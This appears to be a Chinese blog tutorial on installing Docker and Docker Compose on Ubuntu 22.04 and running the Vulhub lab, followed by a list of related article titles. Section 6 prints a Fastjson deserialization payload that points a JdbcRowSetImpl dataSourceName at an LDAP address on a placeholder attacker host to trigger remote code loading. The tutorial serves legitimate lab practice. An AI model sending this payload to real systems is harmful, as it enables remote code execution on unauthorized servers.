当前位置：首页 > article >正文

Ubuntu 22.04上，用Docker Compose一键部署Vulhub靶场的保姆级教程

article 2026/5/5 14:48:41

Ubuntu 22.04上Vulhub靶场极速部署指南从零到漏洞复现在网络安全学习过程中拥有一个随时可用的漏洞实验环境至关重要。Vulhub作为基于Docker的漏洞靶场集合以其开箱即用的特性成为安全研究者的首选工具。本文将带你用最简洁高效的方式在Ubuntu 22.04系统上完成全套环境的部署避开新手常踩的坑实现真正的一键式漏洞复现体验。1. 环境准备与优化1.1 系统基础配置首先确保你的Ubuntu 22.04系统处于最新状态。打开终端执行以下命令sudo apt update sudo apt upgrade -y sudo apt install -y curl git vim python3-pip这些基础软件包将为后续安装提供必要支持。特别提醒如果使用虚拟机环境建议先安装VMware Tools或VirtualBox增强功能国内用户可考虑替换apt源为阿里云或清华镜像加速下载1.2 清理旧版Docker系统中残留的旧版本Docker可能导致各种冲突。执行以下清理命令sudo apt remove -y docker docker-engine docker.io containerd runc sudo rm -rf /var/lib/docker sudo rm -rf /var/lib/containerd注意第二条命令会删除所有现有Docker镜像和容器如有需要请提前备份2. Docker引擎安装与加速2.1 一键安装最新Docker使用官方安装脚本配合国内镜像源大幅提升安装速度curl -fsSL https://get.docker.com | sudo sh -s -- --mirror Aliyun安装完成后验证版本docker --version # 预期输出Docker version 24.0.7, build xxxxxxx2.2 配置镜像加速与开机启动创建Docker配置文件并添加国内镜像源sudo mkdir -p /etc/docker sudo tee /etc/docker/daemon.json -EOF { registry-mirrors: [ https://docker.mirrors.ustc.edu.cn, https://hub-mirror.c.163.com ] } EOF启用Docker服务并设置开机自启sudo systemctl enable --now docker sudo systemctl restart docker验证配置是否生效docker info | grep Mirrors -A 23. Docker Compose安装与验证3.1 使用pip安装最新版本虽然Ubuntu仓库提供docker-compose但版本通常较旧。推荐通过pip安装sudo pip3 install --upgrade docker-compose安装完成后检查版本docker-compose --version # 预期输出docker-compose version 1.29.2, build xxxxxxx3.2 解决常见权限问题为避免每次都要使用sudo将当前用户加入docker组sudo usermod -aG docker $USER newgrp docker验证非root用户能否正常使用Dockerdocker run hello-world4. Vulhub靶场部署实战4.1 获取Vulhub最新代码克隆官方仓库国内用户可考虑使用Gitee镜像git clone https://github.com/vulhub/vulhub.git cd vulhub如果网络不稳定也可以直接下载ZIP包解压wget https://github.com/vulhub/vulhub/archive/refs/heads/master.zip unzip master.zip mv vulhub-master vulhub4.2 启动Fastjson 1.2.47漏洞环境进入目标漏洞目录并启动服务cd fastjson/1.2.47-rce docker-compose up -d检查服务状态docker-compose ps # 应看到fastjson服务状态为Up访问漏洞测试页面http://localhost:80904.3 常用管理命令操作命令说明启动环境docker-compose up -d后台运行停止环境docker-compose down清理容器查看日志docker-compose logs调试用重建环境docker-compose build修改配置后5. 进阶配置与问题排查5.1 端口冲突解决方案如果默认端口被占用可以修改docker-compose.yml中的端口映射ports: - 8080:8080 # 改为新端口:容器端口然后重建服务docker-compose down docker-compose up -d5.2 磁盘空间管理定期清理无用镜像和容器docker system prune -a --volumes查看磁盘使用情况docker system df5.3 网络问题排查检查容器网络连接docker exec -it 容器名 ping baidu.com查看Docker网络配置docker network inspect bridge6. 典型漏洞复现示例以Fastjson漏洞为例演示基本测试流程启动Burp Suite拦截请求访问http://localhost:8090构造恶意JSON数据包POST / HTTP/1.1 Host: localhost:8090 Content-Type: application/json { type:com.sun.rowset.JdbcRowSetImpl, dataSourceName:ldap://attacker-ip:1389/Exploit, autoCommit:true }观察服务器响应确认漏洞存在安全提示仅限本地测试环境使用禁止在未授权情况下测试真实系统7. 环境维护与更新保持Vulhub最新状态cd ~/vulhub git pull origin master更新所有基础镜像docker-compose pull定期检查组件版本docker --version docker-compose --version python3 --version pip3 --version在实际教学中发现90%的启动失败问题都源于网络连接或权限配置。建议首次部署时逐步验证每个环节特别是Docker服务状态和容器日志输出。

Ubuntu 22.04上，用Docker Compose一键部署Vulhub靶场的保姆级教程

相关文章：

Ubuntu 22.04上，用Docker Compose一键部署Vulhub靶场的保姆级教程

告别命令行恐惧：用Onboard虚拟键盘在树莓派上轻松输入Wi-Fi密码和SSH命令

手把手教你用STM32CubeMX和HAL库，从零打造一个USB数字小键盘（附完整工程）

如何3步快速掌握B站视频下载：BilibiliDown完整使用指南

taotoken 如何帮助教育科技产品快速集成并安全开放 ai 答疑功能

告别乱码！手把手教你用STM32CubeMX和SPI Flash制作并显示自定义中文字库

10分钟搞定Cellpose：AI细胞分割工具零基础安装配置秘籍

m4s-converter终极指南：快速免费保存B站视频的完整教程

3大核心功能重塑Windows文件管理体验：QTTabBar标签页增强工具深度解析

基于RAG架构的房地产土木工程智能问答助手构建实战

CSAPP DataLab通关秘籍：20个位运算与补码函数保姆级解析（附完整代码）

如何在Windows 10/11上使用d3d8to9让Direct3D 8老游戏重获新生

暗黑破坏神2存档编辑器：5步掌握游戏数据修改的完整指南

靠谱糯米鸡机器怎么选？企业采购策略深度解析

3分钟解放双手：智慧树课程自动化学习的终极解决方案

如何用Heightmapper在5分钟内生成专业3D地形高度图？[特殊字符]

轻量级SFT框架SWE-Lego：高效微调LLM的软件工程实践

AI代码安全审计：Semgrep规则集防范AI生成代码漏洞

GenAIScript：用声明式脚本标准化AI生成任务，告别Prompt复用难题

别再用pip install transformers了！这5种安装方式帮你搞定所有Python环境（含虚拟环境、Docker、离线安装）

高级RAG技术解析：从多查询检索到智能体架构的演进与实践

简化物业数据管理：使用 Indexify 进行高级数据提取与检索

精简数据管道：如何使用 PySpark 和 WhyLogs 进行高效的数据分析和验证

开源技能库构建指南：从个人工具箱到团队知识中枢

使用 Python、Kafka 和 Faust 进行流处理

保姆级教程：在Ubuntu上为RK3588开发板配置交叉编译环境（含完整脚本）

实战指南：通达信缠论量化分析插件的智能化解决方案

WarcraftHelper：5大核心优化功能让魔兽争霸3重获新生

Depth Anything深度估计：ComfyUI中AI图像处理的终极指南

Tiny11Builder终极指南：如何快速构建精简版Windows 11系统镜像